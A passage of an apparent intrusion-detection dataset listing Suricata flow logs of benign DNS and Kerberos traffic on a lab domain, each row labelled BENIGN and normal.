Flow ID
string
event_types
string
log
string
alerted
bool
class
string
truth
bool
start
string
age
int64
Day
string
event_type_alert
string
num_tokens
int64
label
string
__index_level_0__
int64
192.168.10.16-24020-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 242, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73542, event_type: dns, proto: UDP, dns_type: query, dns_id: 21479, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 0 ; pcap_cnt: 73543, event_type: dns, proto: UDP, dns_type: query, dns_id: 21479, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 1 ; pcap_cnt: 73546, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 21479, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73547, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 21479, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:17
176
Friday
[]
781
normal
1,204,398
192.168.10.16-55333-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 180, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73516, event_type: dns, proto: UDP, dns_type: query, dns_id: 58170, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 0 ; pcap_cnt: 73517, event_type: dns, proto: UDP, dns_type: query, dns_id: 58170, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 1 ; pcap_cnt: 73520, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 58170, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3 ; pcap_cnt: 73521, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 58170, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3
false
BENIGN
false
12:07:17
164
Friday
[]
609
normal
1,204,391
192.168.10.16-35294-192.168.10.3-88-17
['flow', 'anomaly', 'anomaly', 'krb5', 'krb5']
event_type: flow, proto: UDP, app_proto: krb5, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 580, flow_bytes_toclient: 2904, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73526, event_type: anomaly, proto: UDP, tx_id: 0, anomaly_app_proto: krb5, anomaly_type: applayer, anomaly_event: weak_encryption, anomaly_layer: proto_parser ; pcap_cnt: 73527, event_type: anomaly, proto: UDP, tx_id: 1, anomaly_app_proto: krb5, anomaly_type: applayer, anomaly_event: weak_encryption, anomaly_layer: proto_parser ; pcap_cnt: 73526, event_type: krb5, proto: UDP, krb5_msg_type: KRB_AS_REP, krb5_cname: UBUNTU32A$, krb5_realm: TESTBED1.CA, krb5_sname: krbtgt/TESTBED1.CA, krb5_encryption: rc4-hmac, krb5_weak_encryption: True ; pcap_cnt: 73527, event_type: krb5, proto: UDP, krb5_msg_type: KRB_AS_REP, krb5_cname: UBUNTU32A$, krb5_realm: TESTBED1.CA, krb5_sname: krbtgt/TESTBED1.CA, krb5_encryption: rc4-hmac, krb5_weak_encryption: True
false
BENIGN
false
12:07:17
762
Friday
[]
423
normal
1,204,393
192.168.10.16-23860-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73532, event_type: dns, proto: UDP, dns_type: query, dns_id: 24689, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73533, event_type: dns, proto: UDP, dns_type: query, dns_id: 24689, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73534, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 24689, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73535, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 24689, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:17
164
Friday
[]
585
normal
1,204,395
192.168.10.16-54403-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73536, event_type: dns, proto: UDP, dns_type: query, dns_id: 49247, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73537, event_type: dns, proto: UDP, dns_type: query, dns_id: 49247, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73538, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 49247, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73539, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 49247, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:17
165
Friday
[]
585
normal
1,204,396
192.168.10.16-2240-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 180, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73540, event_type: dns, proto: UDP, dns_type: query, dns_id: 5911, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 0 ; pcap_cnt: 73541, event_type: dns, proto: UDP, dns_type: query, dns_id: 5911, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 1 ; pcap_cnt: 73544, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 5911, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3 ; pcap_cnt: 73545, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 5911, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3
false
BENIGN
false
12:07:17
165
Friday
[]
609
normal
1,204,397
192.168.10.16-7285-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 186, flow_bytes_toclient: 308, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73528, event_type: dns, proto: UDP, dns_type: query, dns_id: 36731, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73529, event_type: dns, proto: UDP, dns_type: query, dns_id: 36731, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73530, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 36731, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73531, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 36731, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:17
164
Friday
[]
823
normal
1,204,394
192.168.10.16-61624-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 186, flow_bytes_toclient: 308, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73554, event_type: dns, proto: UDP, dns_type: query, dns_id: 35973, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73555, event_type: dns, proto: UDP, dns_type: query, dns_id: 35973, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73556, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 35973, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73557, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 35973, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:17
160
Friday
[]
823
normal
1,204,399
192.168.10.16-2928-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 180, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73562, event_type: dns, proto: UDP, dns_type: query, dns_id: 50066, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 0 ; pcap_cnt: 73563, event_type: dns, proto: UDP, dns_type: query, dns_id: 50066, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 1 ; pcap_cnt: 73566, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 50066, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3 ; pcap_cnt: 73567, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 50066, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3
false
BENIGN
false
12:07:17
167
Friday
[]
609
normal
1,204,401
192.168.10.16-17463-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 242, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73564, event_type: dns, proto: UDP, dns_type: query, dns_id: 15863, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 0 ; pcap_cnt: 73565, event_type: dns, proto: UDP, dns_type: query, dns_id: 15863, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 1 ; pcap_cnt: 73568, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 15863, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73569, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 15863, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:17
177
Friday
[]
785
normal
1,204,402
192.168.10.16-30565-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 242, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73518, event_type: dns, proto: UDP, dns_type: query, dns_id: 61100, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 0 ; pcap_cnt: 73519, event_type: dns, proto: UDP, dns_type: query, dns_id: 61100, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 1 ; pcap_cnt: 73522, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 61100, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73523, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 61100, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:17
175
Friday
[]
781
normal
1,204,392
192.168.10.16-53985-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73558, event_type: dns, proto: UDP, dns_type: query, dns_id: 5580, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73559, event_type: dns, proto: UDP, dns_type: query, dns_id: 5580, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73560, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 5580, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73561, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 5580, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:17
182
Friday
[]
585
normal
1,204,400
192.168.10.16-57985-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 180, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73704, event_type: dns, proto: UDP, dns_type: query, dns_id: 51974, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 0 ; pcap_cnt: 73705, event_type: dns, proto: UDP, dns_type: query, dns_id: 51974, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 1 ; pcap_cnt: 73708, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 51974, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3 ; pcap_cnt: 73709, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 51974, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3
false
BENIGN
false
12:07:18
174
Friday
[]
605
normal
1,204,412
192.168.10.16-57449-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 164, flow_bytes_toclient: 264, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73649, event_type: dns, proto: UDP, dns_type: query, dns_id: 23356, dns_rrname: _ldap._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73650, event_type: dns, proto: UDP, dns_type: query, dns_id: 23356, dns_rrname: _ldap._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73653, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 23356, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _ldap._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _ldap._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73654, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 23356, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _ldap._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _ldap._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
208
Friday
[]
578
normal
1,204,405
192.168.10.16-25966-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 160, flow_bytes_toclient: 260, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73679, event_type: dns, proto: UDP, dns_type: query, dns_id: 14198, dns_rrname: _gc._tcp.Testbed1.ca, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73680, event_type: dns, proto: UDP, dns_type: query, dns_id: 14198, dns_rrname: _gc._tcp.Testbed1.ca, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73681, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 14198, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _gc._tcp.Testbed1.ca, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _gc._tcp.Testbed1.ca, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73682, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 14198, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _gc._tcp.Testbed1.ca, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _gc._tcp.Testbed1.ca, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
194
Friday
[]
561
normal
1,204,408
192.168.10.16-20776-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73744, event_type: dns, proto: UDP, dns_type: query, dns_id: 12054, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73745, event_type: dns, proto: UDP, dns_type: query, dns_id: 12054, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73746, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 12054, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73747, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 12054, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
155
Friday
[]
585
normal
1,204,422
192.168.10.16-48521-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73696, event_type: dns, proto: UDP, dns_type: query, dns_id: 62935, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73697, event_type: dns, proto: UDP, dns_type: query, dns_id: 62935, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73698, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 62935, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73699, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 62935, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
155
Friday
[]
589
normal
1,204,410
192.168.10.16-6736-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
